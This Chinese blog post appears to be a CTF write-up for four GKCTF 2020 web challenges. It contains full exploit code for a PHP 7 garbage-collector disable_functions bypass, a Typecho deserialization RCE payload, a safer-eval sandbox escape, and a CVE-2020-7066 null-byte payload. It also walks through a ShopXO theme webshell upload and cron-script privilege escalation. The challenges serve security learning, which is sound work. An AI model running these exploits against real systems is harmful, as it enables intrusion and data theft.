devbox
小惠珠哦
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

CTF-NSSCTF题单[GKCTF2020]

作者:小惠珠哦 | 2024-07-30 08:26:53

CTF-NSSCTF题单[GKCTF2020]

[GKCTF 2020]CheckIN

这道题目考察:php7-gc-bypass漏洞

打开这道题目,开始以为考察反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。这里出现了一个eval()函数,猜测考察命令执行

看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');)

没有什么反应,试试别的命令phpinfo(); 

?Ginkgo=ZXZhbCgkX1BPU1RbJ2FiYyddKTs=

出现反应,发现这个点是可以进行利用的,应该是php过滤了危险函数,在phpinfo中的disable_functions可以看到!

尝试着用一句话来突破!
构造url: 源码:?Ginkgo=eval($_POST['abc']);

?Ginkgo=ZXZhbCgkX1BPU1RbJ2FiYyddKTs=

 蚁剑进行连接

 找flag的时候出现了乱码

猜测就是运行它来读flag!

php版本:7.3.24

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

exp:exploits/php7-gc-bypass/exploit.php at master · mm0r1/exploits (github.com)

  1. <?php
  2.  
  3. # PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
  4. #
  5. # Bug: https://bugs.php.net/bug.php?id=72530
  6. #
  7. # This exploit should work on all PHP 7.0-7.3 versions
  8. #
  9. # Author: https://github.com/mm0r1
  10.  
  11. pwn("/readflag");
  12.  
  13. function pwn($cmd) {
  14.     global $abc, $helper;
  15.  
  16.     function str2ptr(&$str, $p = 0, $s = 8) {
  17.         $address = 0;
  18.         for($j = $s-1; $j >= 0; $j--) {
  19.             $address <<= 8;
  20.             $address |= ord($str[$p+$j]);
  21.         }
  22.         return $address;
  23.     }
  24.  
  25.     function ptr2str($ptr, $m = 8) {
  26.         $out = "";
  27.         for ($i=0; $i < $m; $i++) {
  28.             $out .= chr($ptr & 0xff);
  29.             $ptr >>= 8;
  30.         }
  31.         return $out;
  32.     }
  33.  
  34.     function write(&$str, $p, $v, $n = 8) {
  35.         $i = 0;
  36.         for($i = 0; $i < $n; $i++) {
  37.             $str[$p + $i] = chr($v & 0xff);
  38.             $v >>= 8;
  39.         }
  40.     }
  41.  
  42.     function leak($addr, $p = 0, $s = 8) {
  43.         global $abc, $helper;
  44.         write($abc, 0x68, $addr + $p - 0x10);
  45.         $leak = strlen($helper->a);
  46.         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
  47.         return $leak;
  48.     }
  49.  
  50.     function parse_elf($base) {
  51.         $e_type = leak($base, 0x10, 2);
  52.  
  53.         $e_phoff = leak($base, 0x20);
  54.         $e_phentsize = leak($base, 0x36, 2);
  55.         $e_phnum = leak($base, 0x38, 2);
  56.  
  57.         for($i = 0; $i < $e_phnum; $i++) {
  58.             $header = $base + $e_phoff + $i * $e_phentsize;
  59.             $p_type  = leak($header, 0, 4);
  60.             $p_flags = leak($header, 4, 4);
  61.             $p_vaddr = leak($header, 0x10);
  62.             $p_memsz = leak($header, 0x28);
  63.  
  64.             if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
  65.                 # handle pie
  66.                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
  67.                 $data_size = $p_memsz;
  68.             } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
  69.                 $text_size = $p_memsz;
  70.             }
  71.         }
  72.  
  73.         if(!$data_addr || !$text_size || !$data_size)
  74.             return false;
  75.  
  76.         return [$data_addr, $text_size, $data_size];
  77.     }
  78.  
  79.     function get_basic_funcs($base, $elf) {
  80.         list($data_addr, $text_size, $data_size) = $elf;
  81.         for($i = 0; $i < $data_size / 8; $i++) {
  82.             $leak = leak($data_addr, $i * 8);
  83.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  84.                 $deref = leak($leak);
  85.                 # 'constant' constant check
  86.                 if($deref != 0x746e6174736e6f63)
  87.                     continue;
  88.             } else continue;
  89.  
  90.             $leak = leak($data_addr, ($i + 4) * 8);
  91.             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
  92.                 $deref = leak($leak);
  93.                 # 'bin2hex' constant check
  94.                 if($deref != 0x786568326e6962)
  95.                     continue;
  96.             } else continue;
  97.  
  98.             return $data_addr + $i * 8;
  99.         }
  100.     }
  101.  
  102.     function get_binary_base($binary_leak) {
  103.         $base = 0;
  104.         $start = $binary_leak & 0xfffffffffffff000;
  105.         for($i = 0; $i < 0x1000; $i++) {
  106.             $addr = $start - 0x1000 * $i;
  107.             $leak = leak($addr, 0, 7);
  108.             if($leak == 0x10102464c457f) { # ELF header
  109.                 return $addr;
  110.             }
  111.         }
  112.     }
  113.  
  114.     function get_system($basic_funcs) {
  115.         $addr = $basic_funcs;
  116.         do {
  117.             $f_entry = leak($addr);
  118.             $f_name = leak($f_entry, 0, 6);
  119.  
  120.             if($f_name == 0x6d6574737973) { # system
  121.                 return leak($addr + 8);
  122.             }
  123.             $addr += 0x20;
  124.         } while($f_entry != 0);
  125.         return false;
  126.     }
  127.  
  128.     class ryat {
  129.         var $ryat;
  130.         var $chtg;
  131.         
  132.         function __destruct()
  133.         {
  134.             $this->chtg = $this->ryat;
  135.             $this->ryat = 1;
  136.         }
  137.     }
  138.  
  139.     class Helper {
  140.         public $a, $b, $c, $d;
  141.     }
  142.  
  143.     if(stristr(PHP_OS, 'WIN')) {
  144.         die('This PoC is for *nix systems only.');
  145.     }
  146.  
  147.     $n_alloc = 10; # increase this value if you get segfaults
  148.  
  149.     $contiguous = [];
  150.     for($i = 0; $i < $n_alloc; $i++)
  151.         $contiguous[] = str_repeat('A', 79);
  152.  
  153.     $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
  154.     $out = unserialize($poc);
  155.     gc_collect_cycles();
  156.  
  157.     $v = [];
  158.     $v[0] = ptr2str(0, 79);
  159.     unset($v);
  160.     $abc = $out[2][0];
  161.  
  162.     $helper = new Helper;
  163.     $helper->b = function ($x) { };
  164.  
  165.     if(strlen($abc) == 79 || strlen($abc) == 0) {
  166.         die("UAF failed");
  167.     }
  168.  
  169.     # leaks
  170.     $closure_handlers = str2ptr($abc, 0);
  171.     $php_heap = str2ptr($abc, 0x58);
  172.     $abc_addr = $php_heap - 0xc8;
  173.  
  174.     # fake value
  175.     write($abc, 0x60, 2);
  176.     write($abc, 0x70, 6);
  177.  
  178.     # fake reference
  179.     write($abc, 0x10, $abc_addr + 0x60);
  180.     write($abc, 0x18, 0xa);
  181.  
  182.     $closure_obj = str2ptr($abc, 0x20);
  183.  
  184.     $binary_leak = leak($closure_handlers, 8);
  185.     if(!($base = get_binary_base($binary_leak))) {
  186.         die("Couldn't determine binary base address");
  187.     }
  188.  
  189.     if(!($elf = parse_elf($base))) {
  190.         die("Couldn't parse ELF header");
  191.     }
  192.  
  193.     if(!($basic_funcs = get_basic_funcs($base, $elf))) {
  194.         die("Couldn't get basic_functions address");
  195.     }
  196.  
  197.     if(!($zif_system = get_system($basic_funcs))) {
  198.         die("Couldn't get zif_system address");
  199.     }
  200.  
  201.     # fake closure object
  202.     $fake_obj_offset = 0xd0;
  203.     for($i = 0; $i < 0x110; $i += 8) {
  204.         write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
  205.     }
  206.  
  207.     # pwn
  208.     write($abc, 0x20, $abc_addr + $fake_obj_offset);
  209.     write($abc, 0xd0 + 0x38, 1, 4); # internal func type
  210.     write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
  211.  
  212.     ($helper->b)($cmd);
  213.  
  214.     exit();
  215. }

修改一下exp的执行目标(“/readflag”),通过蚁剑上传至tmp目录下(因为这目录的权限较高)

上传成功后在页面里包含文件即可获得flag

  1. ?Ginkgo=include(’/tmp/test.php’);
  2. Base64后?Ginkgo=aW5jbHVkZSgnL3RtcC90ZXN0LnBocCcpOw==

[GKCTF 2020]cve版签到

考察:cve-2020-7066漏洞

cve-2020-7066: 在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。

两者结合利用零字符截断使get_headers()请求到本地127.0.0.1

payload:

?url=http://127.0.0.1%00www.ctfhub.com

提示Host必须以123结尾

payload:

?url=http://127.0.0.123%00www.ctfhub.com

[GKCTF 2020]ez三剑客-easynode 

考察:safer-eval漏洞(沙盒逃逸)

查看源码

  1. const express = require('express');
  2. const bodyParser = require('body-parser');
  3.  
  4. const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库
  5.  
  6. const fs = require('fs');
  7.  
  8. const app = express();
  9.  
  10.  
  11. app.use(bodyParser.urlencoded({ extended: false }));
  12. app.use(bodyParser.json());
  13.  
  14. // 2020.1/WORKER2 老板说为了后期方便优化
  15. app.use((req, res, next) => {
  16.   if (req.path === '/eval') {
  17.     let delay = 60 * 1000;
  18.     console.log(delay);
  19.     if (Number.isInteger(parseInt(req.query.delay))) {
  20.       delay = Math.max(delay, parseInt(req.query.delay));
  21.     }
  22.     const t = setTimeout(() => next(), delay);
  23.     // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
  24.     setTimeout(() => {
  25.       clearTimeout(t);
  26.       console.log('timeout');
  27.       try {
  28.         res.send('Timeout!');
  29.       } catch (e) {
  30.  
  31.       }
  32.     }, 1000);
  33.   } else {
  34.     next();
  35.   }
  36. });
  37.  
  38. app.post('/eval', function (req, res) {
  39.   let response = '';
  40.   if (req.body.e) {
  41.     try {
  42.       response = saferEval(req.body.e);
  43.     } catch (e) {
  44.       response = 'Wrong Wrong Wrong!!!!';
  45.     }
  46.   }
  47.   res.send(String(response));
  48. });
  49.  
  50. // 2019.10/WORKER1 老板娘说她要看到我们的源代码,用行数计算KPI
  51. app.get('/source', function (req, res) {
  52.   res.set('Content-Type', 'text/javascript;charset=utf-8');
  53.   res.send(fs.readFileSync('./index.js'));
  54. });
  55.  
  56. // 2019.12/WORKER3 为了方便我自己查看版本,加上这个接口
  57. app.get('/version', function (req, res) {
  58.   res.set('Content-Type', 'text/json;charset=utf-8');
  59.   res.send(fs.readFileSync('./package.json'));
  60. });
  61.  
  62. app.get('/', function (req, res) {
  63.   res.set('Content-Type', 'text/html;charset=utf-8');
  64.   res.send(fs.readFileSync('./index.html'))
  65. })
  66.  
  67. app.listen(80, '0.0.0.0', () => {
  68.   console.log('Start listening')
  69. });
  70.

const saferEval = require('safer-eval')nodejs的题在ha1cyon出现了几次,一般涉及到nodejs的题就是沙箱逃逸,而导致能够沙箱逃逸的,通常都是库的问题,题目有特地强调了这个safer-eval的库,直接去githubissues----直接搜索safer-eval

看这段代码

  1. if (req.path === '/eval') {
  2.     let delay = 60 * 1000;
  3.     console.log(delay);
  4.     if (Number.isInteger(parseInt(req.query.delay))) {
  5.       delay = Math.max(delay, parseInt(req.query.delay));
  6.     }
  7.     const t = setTimeout(() => next(), delay);
  8.     // 2020.1/WORKER3 老板说让我优化一下速度,我就直接这样写了,其他人写了啥关我p事
  9.     setTimeout(() => {
  10.       clearTimeout(t);
  11.       console.log('timeout');
  12.       try {
  13.         res.send('Timeout!');
  14.       } catch (e) {
  15.  
  16.       }
  17.     }, 1000);
  18.   } else {
  19.     next();
  20.   }

访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。

浏览器内部使用32位带符号的整数来储存推迟执行的时间这意味着setTimeout最多延迟2147483647秒。只要大于2147483647,就会发生溢出,就可以绕过那个时间限制,进入下一个路由

绕过paylaod:

/eval/?delay=23333333333333333333333

所以利用溢出就可以成功绕过timeout。
绕过之后就是这个:

  1. let response = '';
  2.   if (req.body.e) {
  3.     try {
  4.       response = saferEval(req.body.e);
  5.     } catch (e) {
  6.       response = 'Wrong Wrong Wrong!!!!';
  7.     }
  8.   }
  9.   res.send(String(response));

post传入参数e,可以saferEval,安全的执行代码,这里想要成功执行需要进行逃逸。
题目也给出了saferEval的版本和这个:

  1. const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库
  2.

直接利用即可:

setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();

 

[GKCTF 2020]老八小超市儿

考察:shopxo漏洞利用

先安装shopxo,后面显示shopxo的后台登录密码

后台管理地址:/admin.php?s=/admin/logininfo.html
默认账号密码登录即可:admin/shopxo 

成功登录后台

在后台找到应用中心-应用商店-主题,然后下载默认主题。

下载下来的主题是一个安装包,然后把你的shell(php马子)放到压缩包的default\_static_ 目录下,如下图

 回到网页上,找到网站管理-主题管理-主题安装(然后选择你加入shell后的主题压缩包进行上传)

访问成功,用蚁剑进行连接 

 连接成功,寻找flag

/flag是假的,但是有线索,提示说真正的flag的在/root 

 

但是/root没有权限访问 

根目录下还发现了个/auto.sh,打开看看 

是个脚本,60秒执行一次,找到这个py脚本

能修改,直接改成os.system("cat /root/flag>/1.txt"),然后等待一分钟左右,在根目录可以找到1.txt

 [GKCTF 2020]ez三剑客-eztypecho

考察:Typecho漏洞

打开题目可以下载源码,然后发现是Typecho,搜索一下漏洞,找到一个反序列化:
Typecho反序列化漏洞导致前台getshell,

Typecho是一个由中国团队开发的开源跨平台博客程序。它基于PHP5构建,并支持多种操作系统(Linux,Unix,BSD,Windows)、 服务器(Apache,Lighttpd,IIS,Nginx)和数据库(Mysql,PostgreSQL,SQLite)。
2017年10月13日,Typecho爆出前台代码执行漏洞

该漏洞主要触发点在install.php文件,在install.php文件的第232行存在unserialize()反序列化函数,这里通过Typecho_Cookie类的get()方法获取的__typecho_config参数没有经过任何过滤,便进行了反序列化操作,那么这里利用这个点就可以进行反序列化攻击。

造成该漏洞的原因主要有两点:
(1)install.php代码逻辑有问题,当 config.inc.php 文件存在时,可绕过判断继续往下执行代码,当网站安装成功之后,如果install.php这个文件没有删除的话,攻击者就可以通过访问install.php继续执行该文件中的操作。
(2)install.php代码中存在unserialize()函数,并且传入反序列化函数的参数可控。

直接使用文章中的exp即可:

  1. <?php
  2.  
  3. class Typecho_Feed
  4. {
  5.     const RSS1 = 'RSS 1.0';
  6.     const RSS2 = 'RSS 2.0';
  7.     const ATOM1 = 'ATOM 1.0';
  8.     const DATE_RFC822 = 'r';
  9.     const DATE_W3CDTF = 'c';
  10.     const EOL = "\n";
  11.     private $_type;
  12.     private $_items;
  13.  
  14.     public function __construct()
  15.     {
  16.         $this->_type = $this::RSS2;
  17.         $this->_items[0] = array(
  18.             'title' => '1',
  19.             'content' => '1',
  20.             'link' => '1',
  21.             'date' => 1540996608,
  22.             'category' => array(new Typecho_Request()),
  23.             'author' => new Typecho_Request(),
  24.         );
  25.     }
  26. }
  27.  
  28. class Typecho_Request
  29. {
  30.     private $_params = array();
  31.     private $_filter = array();
  32.  
  33.     public function __construct(){
  34.         $this->_params['screenName'] = 'system("cat /flag");';//执行的代码
  35.         $this->_filter[0] = 'assert';
  36.     }
  37. }
  38.  
  39. $payload = array(
  40.     'adapter' => new Typecho_Feed(),
  41.     'prefix' => 'typecho_'
  42. );
  43.  
  44. echo base64_encode(serialize($payload));
  45.  
  46. ?>

运行得到:

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo2OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NzoiY29udGVudCI7czoxOiIxIjtzOjQ6ImxpbmsiO3M6MToiMSI7czo0OiJkYXRlIjtpOjE1NDA5OTY2MDg7czo4OiJjYXRlZ29yeSI7YToxOntpOjA7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyMDoic3lzdGVtKCJjYXQgL2ZsYWciKTsiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czoyMDoic3lzdGVtKCJjYXQgL2ZsYWciKTsiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9

我们需要触发则需要传入一个start,而且因为这里:

 

所以我们还要传入referer,获取flag方法如下:

 

但是好像最后也没有获取到flag 

漏洞分析

详细请看这篇博客Typecho v1.1反序列化前台getshell漏洞分析_typecho 前台getshell-CSDN博客

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小惠珠哦/article/detail/1000002
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号